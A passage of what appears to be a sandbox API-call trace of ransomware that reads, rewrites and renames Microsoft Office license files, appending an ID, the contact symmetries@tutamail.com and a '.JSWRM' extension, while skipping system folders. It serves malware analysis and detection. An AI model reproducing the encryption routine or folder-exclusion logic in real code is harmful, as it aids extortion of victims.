cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0102.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0102.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0102.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0102.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0102.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-bridge-office.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-bridge-office.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-bridge-office.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-bridge-office.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0102.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0102.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0102.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.615] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe28ea227, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe28ea227, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2982ba2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc93, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="client-issuance-root-bridge-test.xrm-ms", cAlternateFileName="CL284D~1.XRM")) returned 1 [0102.615] lstrcmpiW (lpString1="client-issuance-root-bridge-test.xrm-ms", lpString2=".") returned 1 [0102.615] lstrcmpiW (lpString1="client-issuance-root-bridge-test.xrm-ms", lpString2="..") returned 1 [0102.615] lstrcmpiW (lpString1="client-issuance-root-bridge-test.xrm-ms", lpString2="...") returned 1 [0102.615] lstrcmpiW (lpString1="client-issuance-root-bridge-test.xrm-ms", lpString2="windows") returned -1 [0102.615] lstrcmpiW (lpString1="client-issuance-root-bridge-test.xrm-ms", lpString2="recovery") returned -1 [0102.615] lstrcmpiW (lpString1="client-issuance-root-bridge-test.xrm-ms", lpString2="perflogs") returned -1 [0102.615] lstrcmpiW (lpString1="client-issuance-root-bridge-test.xrm-ms", lpString2="documents and settings") returned -1 [0102.615] lstrcmpiW (lpString1="client-issuance-root-bridge-test.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.615] lstrcmpiW (lpString1="client-issuance-root-bridge-test.xrm-ms", lpString2="system volume information") returned -1 [0102.615] lstrcmpiW (lpString1="client-issuance-root-bridge-test.xrm-ms", lpString2="msocache") returned -1 [0102.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0102.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-root-bridge-test.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0102.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-root-bridge-test.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-root-bridge-test.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0102.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0102.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0102.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-root-bridge-test.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0102.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-root-bridge-test.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-root-bridge-test.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0102.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0102.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0102.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0102.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0102.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-root-bridge-test.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-root-bridge-test.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.617] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3219) returned 1 [0102.617] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc90) returned 0x205850 [0102.617] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xc90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xc90, lpOverlapped=0x0) returned 1 [0102.619] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.619] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xc90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xc90, lpOverlapped=0x0) returned 1 [0102.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.619] CloseHandle (hObject=0x45c) returned 1 [0102.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0102.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0102.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0102.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0102.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0102.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0102.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.619] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-root-bridge-test.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-root-bridge-test.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-root-bridge-test.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-root-bridge-test.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0102.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0102.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0102.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.620] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe28c3fe1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe28c3fe1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe295c968, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc1f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="client-issuance-root.xrm-ms", cAlternateFileName="CLIENT~4.XRM")) returned 1 [0102.620] lstrcmpiW (lpString1="client-issuance-root.xrm-ms", lpString2=".") returned 1 [0102.620] lstrcmpiW (lpString1="client-issuance-root.xrm-ms", lpString2="..") returned 1 [0102.620] lstrcmpiW (lpString1="client-issuance-root.xrm-ms", lpString2="...") returned 1 [0102.621] lstrcmpiW (lpString1="client-issuance-root.xrm-ms", lpString2="windows") returned -1 [0102.621] lstrcmpiW (lpString1="client-issuance-root.xrm-ms", lpString2="recovery") returned -1 [0102.621] lstrcmpiW (lpString1="client-issuance-root.xrm-ms", lpString2="perflogs") returned -1 [0102.621] lstrcmpiW (lpString1="client-issuance-root.xrm-ms", lpString2="documents and settings") returned -1 [0102.621] lstrcmpiW (lpString1="client-issuance-root.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.621] lstrcmpiW (lpString1="client-issuance-root.xrm-ms", lpString2="system volume information") returned -1 [0102.621] lstrcmpiW (lpString1="client-issuance-root.xrm-ms", lpString2="msocache") returned -1 [0102.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0102.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-root.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0102.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-root.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2413a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-root.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0102.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-root.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0102.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-root.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241290, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-root.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0102.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0102.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0102.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-root.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-root.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.622] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3103) returned 1 [0102.622] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc10) returned 0x205850 [0102.622] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xc10, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xc10, lpOverlapped=0x0) returned 1 [0102.624] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.624] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xc10, lpOverlapped=0x0) returned 1 [0102.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.624] CloseHandle (hObject=0x45c) returned 1 [0102.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0102.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0102.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0102.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0102.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0102.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0102.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-root.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-root.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-root.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-root.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0102.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0102.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0102.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0102.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0102.625] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe289dd92, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe289dd92, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe29366eb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd34, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="client-issuance-stil.xrm-ms", cAlternateFileName="CLIENT~3.XRM")) returned 1 [0102.625] lstrcmpiW (lpString1="client-issuance-stil.xrm-ms", lpString2=".") returned 1 [0102.625] lstrcmpiW (lpString1="client-issuance-stil.xrm-ms", lpString2="..") returned 1 [0102.626] lstrcmpiW (lpString1="client-issuance-stil.xrm-ms", lpString2="...") returned 1 [0102.626] lstrcmpiW (lpString1="client-issuance-stil.xrm-ms", lpString2="windows") returned -1 [0102.626] lstrcmpiW (lpString1="client-issuance-stil.xrm-ms", lpString2="recovery") returned -1 [0102.626] lstrcmpiW (lpString1="client-issuance-stil.xrm-ms", lpString2="perflogs") returned -1 [0102.626] lstrcmpiW (lpString1="client-issuance-stil.xrm-ms", lpString2="documents and settings") returned -1 [0102.626] lstrcmpiW (lpString1="client-issuance-stil.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.626] lstrcmpiW (lpString1="client-issuance-stil.xrm-ms", lpString2="system volume information") returned -1 [0102.626] lstrcmpiW (lpString1="client-issuance-stil.xrm-ms", lpString2="msocache") returned -1 [0102.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0102.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-stil.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0102.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-stil.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2412e0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-stil.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0102.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0102.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-stil.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0102.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-stil.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241290, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-stil.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0102.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0102.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0102.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0102.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-stil.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-stil.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.628] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3380) returned 1 [0102.628] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd30) returned 0x205850 [0102.628] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xd30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xd30, lpOverlapped=0x0) returned 1 [0102.630] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.630] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xd30, lpOverlapped=0x0) returned 1 [0102.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.630] CloseHandle (hObject=0x45c) returned 1 [0102.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0102.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: 